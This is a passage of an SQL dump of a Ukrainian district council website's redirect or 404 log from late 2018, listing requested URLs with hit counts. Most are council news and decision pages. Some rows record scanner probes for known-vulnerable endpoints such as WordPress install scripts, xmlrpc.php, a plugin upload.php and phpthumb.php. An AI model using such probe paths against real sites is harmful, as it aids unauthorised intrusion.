00:00:00',301),(32836,'https://www.malyn-rayrada.gov.ua/index.php/1546-vibori-pirizhkivskogo-silskogo-golovi-4-grudnya-2016-roku',NULL,'','',11,0,'2018-11-30 08:56:17','0000-00-00 00:00:00',301),(32837,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1461-pro-zatverdzhennya-poryadku-priznachennya-na-posadu-kerivnikiv-zagalnoosvitnikh-zakladiv-komunalnoji-formi-vlasnosti-malinskogo-rajonu-zhitomirskoji-oblasti',NULL,'','',5,0,'2018-11-30 09:28:54','0000-00-00 00:00:00',301),(32838,'https://www.malyn-rayrada.gov.ua/index.php/1101-informue-nachalnik-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-malegus-a-s-shchodo-viplat-pensij-za-traven',NULL,'','',5,0,'2018-11-30 09:32:23','0000-00-00 00:00:00',301),(32839,'https://www.malyn-rayrada.gov.ua/index.php/1573-vidbulas-10-sesiya-rajonnoji-radi',NULL,'','',12,0,'2018-11-30 10:21:41','0000-00-00 00:00:00',301),(32840,'https://malyn-rayrada.gov.ua/attachments/article/1633/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  14-7.pdf',NULL,'','',4,0,'2018-11-30 18:35:23','0000-00-00 00:00:00',301),(32841,'https://malyn-rayrada.gov.ua/user/login',NULL,'','',5,0,'2018-12-01 09:07:59','0000-00-00 00:00:00',301),(32842,'https://malyn-rayrada.gov.ua/wp-admin/setup-config.php',NULL,'','',6,0,'2018-12-01 09:08:01','0000-00-00 00:00:00',301),(32843,'https://malyn-rayrada.gov.ua/wp-admin/install.php',NULL,'','',3,0,'2018-12-01 09:08:02','0000-00-00 00:00:00',301),(32844,'https://malyn-rayrada.gov.ua/installation/index.php',NULL,'','',2,0,'2018-12-01 09:08:03','0000-00-00 00:00:00',301),(32845,'https://malyn-rayrada.gov.ua/admin',NULL,'','',21,0,'2018-12-01 09:08:04','0000-00-00 00:00:00',301),(32846,'https://malyn-rayrada.gov.ua/admin/login.php',NULL,'','',9,0,'2018-12-01 09:08:05','0000-00-00 00:00:00',301),(32847,'https://www.malyn-rayrada.gov.ua/index.php/1992-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-pershij-kvartal-2018-roku',NULL,'','',10,0,'2018-12-02 01:08:32','0000-00-00 00:00:00',301),(32848,'https://malyn-rayrada.gov.ua/index.php/1985-pro-sklikannya-24-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',11,0,'2018-12-02 01:21:58','0000-00-00 00:00:00',301),(32849,'https://www.malyn-rayrada.gov.ua/index.php/1653-z-dnem-sobornosti',NULL,'','',15,0,'2018-12-03 03:24:33','0000-00-00 00:00:00',301),(32850,'https://malyn-rayrada.gov.ua/attachments/article/1883/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  21-7.pdf',NULL,'','',2,0,'2018-12-03 20:51:24','0000-00-00 00:00:00',301),(32851,'https://malyn-rayrada.gov.ua/index.php/1721-pro-sklikannya-17-sesiji-rajonnoji-radi-7-sklikannya',NULL,'http://malyn-rayrada.gov.ua/index.php/1721-pro-sklikannya-17-sesiji-rajonnoji-radi-7-sklikannya','',8,0,'2018-12-03 23:12:38','0000-00-00 00:00:00',301),(32852,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2122-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-rajonnoji-radi-v-novij-redaktsiji?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-03 23:50:48','0000-00-00 00:00:00',301),(32853,'https://www.malyn-rayrada.gov.ua/img src=\'/old.kurs.com.ua/static/images/informer/kurs.png\' width=\'52\' height=\'26\' alt=\'kurs.com.ua: курс валют в украине!\' title=\'курс валют\' border=\'0\' /',NULL,'','',3,0,'2018-12-04 05:19:11','0000-00-00 00:00:00',301),(32854,'https://www.malyn-rayrada.gov.ua/index.php/1780-upravlinnya-derzhprodspozhivsluzhbi-v-malinskomu-rajoni-nagoloshue-vid-kishkovikh-infektsij-mozhna-uberegtisya',NULL,'','',6,0,'2018-12-04 06:43:51','0000-00-00 00:00:00',301),(32855,'https://malyn-rayrada.gov.ua/attachments/article/1784/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-12-04 06:45:27','0000-00-00 00:00:00',301),(32856,'https://www.malyn-rayrada.gov.ua/index.php/1515-informatsiya-shchodo-roboti-kabelnogo-telebachennya-v-mikrorajoni-paperovoji-fabriki',NULL,'','',11,0,'2018-12-04 09:47:14','0000-00-00 00:00:00',301),(32857,'https://www.malyn-rayrada.gov.ua/index.php/2024-p-l-a-n-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-24-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',3,0,'2018-12-04 15:36:42','0000-00-00 00:00:00',301),(32858,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2122-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-rajonnoji-radi-v-novij-redaktsiji',NULL,'','',22,0,'2018-12-04 16:20:58','0000-00-00 00:00:00',301),(32859,'https://malyn-rayrada.gov.ua/attachments/article/1572/ðÿñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ  10 ñ ðµñ ñ–ñ 7.pdf',NULL,'','',16,0,'2018-12-04 17:57:54','0000-00-00 00:00:00',301),(32860,'https://malyn-rayrada.gov.ua/attachments/article/1564/ð†ð½ñ„ð¾ñ€ð¼ð°ñ†ñ–ñ  ð¿ñ€ð¾ðºñƒñ€.pdf',NULL,'','',2,0,'2018-12-04 20:45:44','0000-00-00 00:00:00',301),(32861,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1776-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskogo-rajonu',NULL,'','',7,0,'2018-12-05 06:10:27','0000-00-00 00:00:00',301),(32862,'https://www.malyn-rayrada.gov.ua/libs.php',NULL,'','',1,0,'2018-12-05 07:22:07','0000-00-00 00:00:00',301),(32863,'https://www.malyn-rayrada.gov.ua//xmlrpc.php?rsd',NULL,'','',2,0,'2018-12-06 02:27:59','0000-00-00 00:00:00',301),(32864,'https://malyn-rayrada.gov.ua/index.php/1616-chempionat-oblasti-z-vilnoji-borotbi?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-06 02:37:07','0000-00-00 00:00:00',301),(32865,'https://www.malyn-rayrada.gov.ua/index.php/2042-pro-sklikannya-25-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',18,0,'2018-12-06 02:39:06','0000-00-00 00:00:00',301),(32866,'https://www.malyn-rayrada.gov.ua/index.php/2045-vitaemo-iz-svyatom-dnem-konstitutsiji-ukrajini',NULL,'','',16,0,'2018-12-06 02:39:26','0000-00-00 00:00:00',301),(32867,'https://www.malyn-rayrada.gov.ua/index.php/1681-vitaemo-iz-8-bereznya',NULL,'','',1,0,'2018-12-06 03:16:25','0000-00-00 00:00:00',301),(32868,'https://malyn-rayrada.gov.ua/attachments/article/1753/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-12-06 19:03:05','0000-00-00 00:00:00',301),(32869,'https://www.malyn-rayrada.gov.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php','',1,0,'2018-12-07 01:23:42','0000-00-00 00:00:00',301),(32870,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2122-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-rajonnoji-radi-v-novij-redaktsiji?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-07 04:25:10','0000-00-00 00:00:00',301),(32871,'https://www.malyn-rayrada.gov.ua/wordpress/wp-admin/',NULL,'','',1,0,'2018-12-09 00:11:49','0000-00-00 00:00:00',301),(32872,'https://www.malyn-rayrada.gov.ua/index.php/1981-za-kozhnoyu-khustkoyu-zhittya-zhinki',NULL,'','',10,0,'2018-12-09 05:28:31','0000-00-00 00:00:00',301),(32873,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2122-pro-zatverdzhennya-strukturi-ta-chiselnosti-vikonavchogo-aparatu-rajonnoji-radi-v-novij-redaktsiji',NULL,'','',12,0,'2018-12-09 06:27:35','0000-00-00 00:00:00',301),(32874,'https://malyn-rayrada.gov.ua/index.php/1530-vidbulas-9-pozachergova-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-11 08:03:33','0000-00-00 00:00:00',301),(32875,'https://malyn-rayrada.gov.ua/index.php/1535-v-likarni-trivae-zagotivlya-ovochiv?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-11 08:03:36','0000-00-00 00:00:00',301),(32876,'https://malyn-rayrada.gov.ua/index.php/1616-chempionat-oblasti-z-vilnoji-borotbi',NULL,'','',42,0,'2018-12-11 08:03:43','0000-00-00 00:00:00',301),(32877,'https://malyn-rayrada.gov.ua/index.php/1679-ogoloshennya-shchodo-komunalnogo-majna',NULL,'','',33,0,'2018-12-11 08:03:46','0000-00-00 00:00:00',301),(32878,'https://www.malyn-rayrada.gov.ua/index.php/1984-vistup-nashikh-bortsiv-u-korosteni-2',NULL,'','',7,0,'2018-12-11 08:10:32','0000-00-00 00:00:00',301),(32879,'https://www.malyn-rayrada.gov.ua/index.php/801-nacionalnij-ekzit-pol-drugogo-turu-ne-bude',NULL,'','',6,0,'2018-12-11 20:29:49','0000-00-00 00:00:00',301),(32880,'https://malyn-rayrada.gov.ua/attachments/article/1858/ð£ðÿð¡ð—ð .pdf',NULL,'','',2,0,'2018-12-11 20:51:18','0000-00-00 00:00:00',301),(32881,'https://malyn-rayrada.gov.ua/index.php/1871-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-21-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'http://malyn-rayrada.gov.ua/index.php/1871-do-vidoma-deputativ-rajonnoji-radi-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-21-sesiyu-rajonnoji-radi-7-sklikannya','',1,0,'2018-12-12 04:02:54','0000-00-00 00:00:00',301),(32882,'https://malyn-rayrada.gov.ua/index.php/1331-vitaemo-iz-novim-2016-rokom',NULL,'http://malyn-rayrada.gov.ua/index.php/1331-vitaemo-iz-novim-2016-rokom','',3,0,'2018-12-12 06:14:10','0000-00-00 00:00:00',301),(32883,'https://malyn-rayrada.gov.ua/index.php/1745-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'http://malyn-rayrada.gov.ua/index.php/1745-do-vidoma-deputativ-rajonnoji-radi-2','',5,0,'2018-12-12 13:50:29','0000-00-00 00:00:00',301),(32884,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1792-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1792-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik','',3,0,'2018-12-12 15:16:18','0000-00-00 00:00:00',301),(32885,'https://www.malyn-rayrada.gov.ua/blog/wp-admin/',NULL,'','',2,0,'2018-12-13 05:28:31','0000-00-00 00:00:00',301),(32886,'https://malyn-rayrada.gov.ua/attachments/article/1614/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-12-13 06:58:35','0000-00-00 00:00:00',301),(32887,'https://malyn-rayrada.gov.ua/index.php/1573-vidbulas-10-sesiya-rajonnoji-radi',NULL,'http://malyn-rayrada.gov.ua/index.php/1573-vidbulas-10-sesiya-rajonnoji-radi','',16,0,'2018-12-13 14:22:07','0000-00-00 00:00:00',301),(32888,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/10-2010-06-05-12-53-35/21-kontaktna-informacija',NULL,'http://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/10-2010-06-05-12-53-35/21-kontaktna-informacija','',17,0,'2018-12-13 16:02:07','0000-00-00 00:00:00',301),(32889,'https://www.malyn-rayrada.gov.ua/test/wp-admin/',NULL,'','',1,0,'2018-12-14 00:41:26','0000-00-00 00:00:00',301),(32890,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1738-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1738-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya','',2,0,'2018-12-14 04:53:47','0000-00-00 00:00:00',301),(32891,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1724-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1724-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi','',6,0,'2018-12-14 06:44:54','0000-00-00 00:00:00',301),(32892,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1708-pro-zatverdzhennya-poryadku-obliku-vitrat-transportnikh-pidpriemstv-pilgovikh-kategorij-gromadyan-za-rakhunok-vidatkiv-z-mistsevogo-byudzhetu',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1708-pro-zatverdzhennya-poryadku-obliku-vitrat-transportnikh-pidpriemstv-pilgovikh-kategorij-gromadyan-za-rakhunok-vidatkiv-z-mistsevogo-byudzhetu','',9,0,'2018-12-14 06:52:27','0000-00-00 00:00:00',301),(32893,'https://malyn-rayrada.gov.ua/img src=',NULL,'http://malyn-rayrada.gov.ua/img src=','',6,0,'2018-12-14 08:04:02','0000-00-00 00:00:00',301),(32894,'https://malyn-rayrada.gov.ua/index.php/1535-v-likarni-trivae-zagotivlya-ovochiv',NULL,'http://malyn-rayrada.gov.ua/index.php/1535-v-likarni-trivae-zagotivlya-ovochiv','',29,0,'2018-12-14 10:13:30','0000-00-00 00:00:00',301),(32895,'https://malyn-rayrada.gov.ua/index.php/2142-vidbulas-27-sesiya-malinskoji-rajonnoji-radi',NULL,'','',2,0,'2018-12-14 14:04:56','0000-00-00 00:00:00',301),(32896,'https://www.malyn-rayrada.gov.ua/wp/wp-admin/',NULL,'','',2,0,'2018-12-14 14:19:07','0000-00-00 00:00:00',301),(32897,'https://www.malyn-rayrada.gov.ua/connectors/system/phpthumb.php',NULL,'','',2,0,'2018-12-14 14:21:12','0000-00-00 00:00:00',301),(32898,'https://malyn-rayrada.gov.ua/index.php/1888-do-pensioneriv',NULL,'http://malyn-rayrada.gov.ua/index.php/1888-do-pensioneriv','',3,0,'2018-12-14 14:34:11','0000-00-00 00:00:00',301),(32899,'https://www.malyn-rayrada.gov.ua/index.php/1894-pro-sklikannya-22-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2018-12-14 16:21:00','0000-00-00 00:00:00',301),(32900,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1673-pro-zakrittya-viddilennya-statsionarnogo-doglyadu-ta-vporyadkuvannya-strukturi-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1673-pro-zakrittya-viddilennya-statsionarnogo-doglyadu-ta-vporyadkuvannya-strukturi-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu','',1,0,'2018-12-14 17:34:38','0000-00-00 00:00:00',301),(32901,'https://www.malyn-rayrada.gov.ua/attachments/article/2125/ð¡ñ‚ñ€ñƒðºñ‚ñƒñ€ð° ñ‚ðµñ€ñ†ðµð½ñ‚ñ€.pdf',NULL,'','',2,0,'2018-12-14 18:07:42','0000-00-00 00:00:00',301),(32902,'https://malyn-rayrada.gov.ua/index.php/1993-ogoloshennya-pro-seminar',NULL,'','',13,0,'2018-12-15 03:27:17','0000-00-00 00:00:00',301),(32903,'https://www.malyn-rayrada.gov.ua/newsite/wp-admin/',NULL,'','',1,0,'2018-12-15 03:36:39','0000-00-00 00:00:00',301),(32904,'https://malyn-rayrada.gov.ua/connectors/system/phpthumb.php',NULL,'','',5,0,'2018-12-15 03:40:50','0000-00-00 00:00:00',301),(32905,'https://malyn-rayrada.gov.ua/attachments/article/2125/ð¡ñ‚ñ€ñƒðºñ‚ñƒñ€ð° ñ‚ðµñ€ñ†ðµð½ñ‚ñ€.pdf',NULL,'','',7,0,'2018-12-15 06:47:56','0000-00-00 00:00:00',301),(32906,'https://malyn-rayrada.gov.ua/index.php/1560-dosit-vdalo-vistupili-nashi-bortsi-vilnogo-stilyu',NULL,'http://malyn-rayrada.gov.ua/index.php/1560-dosit-vdalo-vistupili-nashi-bortsi-vilnogo-stilyu','',27,0,'2018-12-15 20:55:07','0000-00-00 00:00:00',301),(32907,'https://malyn-rayrada.gov.ua/index.php/1637-pro-osoblivosti-viplati-pensij-za-sichen-2017-roku',NULL,'','',25,0,'2018-12-16 03:12:46','0000-00-00 00:00:00',301),(32908,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2113-pro-vnesennya-zmin-do-programi-zabezpechennya-vikonannya-malinskoyu-rajonnoyu-derzhavnoyu-administratsieyu-delegovanikh-povnovazhen-na-2018-2020-roki',NULL,'https://www.google.com/','',21,0,'2018-12-17 06:15:47','0000-00-00 00:00:00',301),(32909,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2136-pro-rajonnij-byudzhet-na-2019-rik',NULL,'','',40,0,'2018-12-17 08:20:06','0000-00-00 00:00:00',301),(32910,'https://malyn-rayrada.gov.ua/index.php/1562-vitaemo-iz-svyatami-dnem-zakhisnika-ukrajini-ta-pokrovoyu-presvyatoji-bogoroditsi-2',NULL,'','',41,0,'2018-12-17 09:39:57','0000-00-00 00:00:00',301),(32911,'https://www.malyn-rayrada.gov.ua/tp1',NULL,'','',1,0,'2018-12-17 12:48:03','0000-00-00 00:00:00',301),(32912,'https://malyn-rayrada.gov.ua//plus/read.php',NULL,'http://malyn-rayrada.gov.ua//plus/read.php','',1,0,'2018-12-17 17:46:54','0000-00-00 00:00:00',301),(32913,'https://malyn-rayrada.gov.ua//lequ.php',NULL,'http://malyn-rayrada.gov.ua//lequ.php','',1,0,'2018-12-17 17:46:57','0000-00-00 00:00:00',301),(32914,'https://malyn-rayrada.gov.ua//plus/result.php',NULL,'http://malyn-rayrada.gov.ua//plus/result.php','',1,0,'2018-12-17 17:46:59','0000-00-00 00:00:00',301),(32915,'https://malyn-rayrada.gov.ua//pdf.php',NULL,'http://malyn-rayrada.gov.ua//pdf.php','',1,0,'2018-12-17 17:47:03','0000-00-00 00:00:00',301),(32916,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/2113-pro-vnesennya-zmin-do-programi-zabezpechennya-vikonannya-malinskoyu-rajonnoyu-derzhavnoyu-administratsieyu-delegovanikh-povnovazhen-na-2018-2020-roki',NULL,'','',14,0,'2018-12-18 15:23:39','0000-00-00 00:00:00',301),(32917,'https://malyn-rayrada.gov.ua/index.php/1219-z-pochatku-2015-roku-na-potrebi-ukrajinskoji-armiji-vid-platnikiv-malinshchini-nadijshlo-majzhe-4-9-mln-grn-vijskovogo-zboru',NULL,'','',41,0,'2018-12-19 10:26:49','0000-00-00 00:00:00',301),(32918,'https://www.malyn-rayrada.gov.ua/index.php/1494-pilotnij-proekt-u-sferi-reestratsiji-gromadskikh-formuvan',NULL,'','',25,0,'2018-12-19 12:09:36','0000-00-00 00:00:00',301),(32919,'https://malyn-rayrada.gov.ua/index.php/1397-obgovorennya-situatsiji-iz-spozhivachami-prirodnogo-gazu',NULL,'','',18,0,'2018-12-19 17:24:31','0000-00-00 00:00:00',301),(32920,'https://www.malyn-rayrada.gov.ua/index.php/1272-z-dnem-zbrojnikh-sil-ukrajini',NULL,'','',8,0,'2018-12-19 17:43:24','0000-00-00 00:00:00',301),(32921,'https://malyn-rayrada.gov.ua/index.php/1348-vijskova-sluzhba-za-kontraktom',NULL,'','',45,0,'2018-12-19 20:36:59','0000-00-00 00:00:00',301),(32922,'https://malyn-rayrada.gov.ua/index.php/947-fotoreportazh-iz-urochistikh-zboriv-do-dnya-mistsevogo-samovryaduvannya',NULL,'','',27,0,'2018-12-19 23:55:57','0000-00-00 00:00:00',301),(32923,'https://malyn-rayrada.gov.ua/index.php/1453-seminar-po-detsentralizatsiji',NULL,'','',65,0,'2018-12-20 06:31:45','0000-00-00 00:00:00',301),(32924,'https://www.malyn-rayrada.gov.ua/index.php/1510-ogoloshennya-3',NULL,'','',23,0,'2018-12-20 07:14:51','0000-00-00 00:00:00',301),(32925,'https://malyn-rayrada.gov.ua/index.php/183-selu-ivanivka-210-rokiv?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-12-20 08:13:53','0000-00-00 00:00:00',301),(32926,'https://malyn-rayrada.gov.ua/index.php/1029-pro-skasuvannya-zoni-radiologichnogo-kontrolyu-ta-pilgove-zabezpechennya',NULL,'','',23,0,'2018-12-20 09:54:29','0000-00-00 00:00:00',301),(32927,'https://malyn-rayrada.gov.ua/index.php/1705-natsionalnij-bank-ukrajini-povidomlyae',NULL,'http://malyn-rayrada.gov.ua/index.php/1705-natsionalnij-bank-ukrajini-povidomlyae','',35,0,'2018-12-20 10:56:28','0000-00-00 00:00:00',301),(32928,'https://www.malyn-rayrada.gov.ua/index.php/1042-moe-ridne-selo-gorin',NULL,'','',14,0,'2018-12-20 12:41:54','0000-00-00 00:00:00',301),(32929,'https://malyn-rayrada.gov.ua/index.php/1158-na-poryadku-dennomu-pitannya-nadannya-gromadyanam-yakisnikh-poslug',NULL,'','',17,0,'2018-12-20 13:02:25','0000-00-00 00:00:00',301),(32930,'https://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1897-pro-khid-vikonannya-rajonnoji-programi-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki',NULL,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1897-pro-khid-vikonannya-rajonnoji-programi-rozvitku-ta-utrimannya-avtomobilnikh-dorig-na-teritoriji-malinskogo-rajonu-na-2015-2017-roki','',2,0,'2018-12-20 13:57:01','0000-00-00 00:00:00',301),(32931,'https://www.malyn-rayrada.gov.ua/index.php/1517-pro-perejmenuvannya-vulits-v-naselenikh-punktakh-chopovitskoji-selishchnoji-radi',NULL,'','',47,0,'2018-12-20 15:24:49','0000-00-00 00:00:00',301),(32932,'https://malyn-rayrada.gov.ua/index.php/1413-informatsiya-shchodo-nadannya-bezoplatnoji-vtorinnoji-pravovoji-dopomogi',NULL,'','',48,0,'2018-12-20 16:24:16','0000-00-00 00:00:00',301),(32933,'https://www.malyn-rayrada.gov.ua/index.php/1463-do-uvagi-vnutrishno-peremishchenikh-osib',NULL,'','',16,0,'2018-12-20 17:29:38','0000-00-00 00:00:00',301),(32934,'https://www.malyn-rayrada.gov.ua/index.php/1458-operatoram-rinku-kharchovikh-produktiv',NULL,'','',23,0,'2018-12-20 18:47:17','0000-00-00 00:00:00',301),(32935,'https://malyn-rayrada.gov.ua/index.php/1133-shukaemo-novu-malu-batkivshchinu',NULL,'','',25,0,'2018-12-20 19:32:18','0000-00-00 00:00:00',301),(32936,'https://malyn-rayrada.gov.ua/index.php/1458-operatoram-rinku-kharchovikh-produktiv',NULL,'','',40,0,'2018-12-20 20:13:16','0000-00-00 00:00:00',301),(32937,'https://malyn-rayrada.gov.ua/index.php/1512-poryadok-ta-umovi-vzyattya-pereselentsiv-na-oblik',NULL,'','',45,0,'2018-12-20 23:45:39','0000-00-00 00:00:00',301),(32938,'https://malyn-rayrada.gov.ua/index.php/1026-nagriemos',NULL,'','',39,0,'2018-12-21 00:05:38','0000-00-00 00:00:00',301),(32939,'https://malyn-rayrada.gov.ua/index.php/923-fotoreportazh-iz-mitingu-bilya-pam-yatnogo-znaku-nebesnij-sotni-z-nagodi-dnya-gidnosti-ta-svobodi',NULL,'','',40,0,'2018-12-21 00:06:15','0000-00-00 00:00:00',301),(32940,'https://malyn-rayrada.gov.ua/index.php/1068-pro-formuvannya-spisku-narodnikh-zasidateliv',NULL,'','',30,0,'2018-12-21 02:43:12','0000-00-00 00:00:00',301),(32941,'https://malyn-rayrada.gov.ua/index.php/992-22-sichnya-den-sobornosti-ukrajini',NULL,'','',42,0,'2018-12-21 02:53:53','0000-00-00 00:00:00',301),(32942,'https://www.malyn-rayrada.gov.ua/index.php/1486-deputati-malinskoji-miskoji-radi-odnogolosno-initsiyuvali-dobrovilne-ob-ednannya-malina-i-rajonu',NULL,'','',28,0,'2018-12-21 02:58:36','0000-00-00 00:00:00',301),(32943,'https://malyn-rayrada.gov.ua/index.php/1273-7-grudnya-deen-mistsevogo-samovryaduvannya',NULL,'','',14,0,'2018-12-21 03:11:51','0000-00-00 00:00:00',301),(32944,'https://malyn-rayrada.gov.ua/index.php/1003-ogoloshennya-fomuvannya-spisku-prisyazhnikh',NULL,'','',27,0,'2018-12-21 03:16:27','0000-00-00 00:00:00',301),(32945,'https://malyn-rayrada.gov.ua/index.php/1139-obgovoreno-shlyakhi-pokrashchennya-spivpratsi-z-uchasnikami-ato',NULL,'','',23,0,'2018-12-21 05:02:10','0000-00-00 00:00:00',301),(32946,'https://malyn-rayrada.gov.ua/index.php/183-selu-ivanivka-210-rokiv',NULL,'','',34,0,'2018-12-21 06:49:00','0000-00-00 00:00:00',301),(32947,'https://malyn-rayrada.gov.ua/index.php/304-foto-video-reportazh-iz-vorsivki-7-travnja',NULL,'','',48,0,'2018-12-21 07:02:37','0000-00-00 00:00:00',301),(32948,'https://malyn-rayrada.gov.ua/index.php/410-ostannij-osinnij-ranok',NULL,'','',35,0,'2018-12-21 07:02:45','0000-00-00 00:00:00',301),(32949,'https://malyn-rayrada.gov.ua/index.php/85-primhi-prirodi-16-20-god-19-07-2011-roku',NULL,'','',40,0,'2018-12-21 07:03:02','0000-00-00 00:00:00',301),(32950,'https://malyn-rayrada.gov.ua/index.php/1517-pro-perejmenuvannya-vulits-v-naselenikh-punktakh-chopovitskoji-selishchnoji-radi',NULL,'','',159,0,'2018-12-21 07:06:09','0000-00-00 00:00:00',301),(32951,'https://www.malyn-rayrada.gov.ua/index.php/1124-den-skorboti-i-vshanuvannya-pam-yati-zhertv-vijni-v-ukrajini',NULL,'','',18,0,'2018-12-21 09:26:14','0000-00-00 00:00:00',301),(32952,'https://www.malyn-rayrada.gov.ua/index.php/1133-shukaemo-novu-malu-batkivshchinu',NULL,'','',17,0,'2018-12-21 13:36:35','0000-00-00 00:00:00',301),(32953,'https://malyn-rayrada.gov.ua/index.php/1545-vshanuvali-lyudej-pokhilogo-viku?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-22 04:30:09','0000-00-00 00:00:00',301),(32954,'https://malyn-rayrada.gov.ua/index.php/1547-kartoplyu-dlya-chopovitskogo-statsionarnogo-viddilennya-zagotovleno?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-22 04:30:37','0000-00-00 00:00:00',301),(32955,'https://malyn-rayrada.gov.ua/index.php/1554-proekt-strategiji-podolannya-naslidkiv-chornobilskoji-katastrofi-ta-vidrodzhennya-teritorij-shcho-zaznali-radioaktivnogo-zabrudnennya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-22 04:31:02','0000-00-00 00:00:00',301),(32956,'https://malyn-rayrada.gov.ua/index.php/1566-viddil-kulturi-malinskoji-rajderzhadministratsiji-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-22 04:32:50','0000-00-00 00:00:00',301),(32957,'https://www.malyn-rayrada.gov.ua/index.php/1068-pro-formuvannya-spisku-narodnikh-zasidateliv?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-12-22 04:34:36','0000-00-00 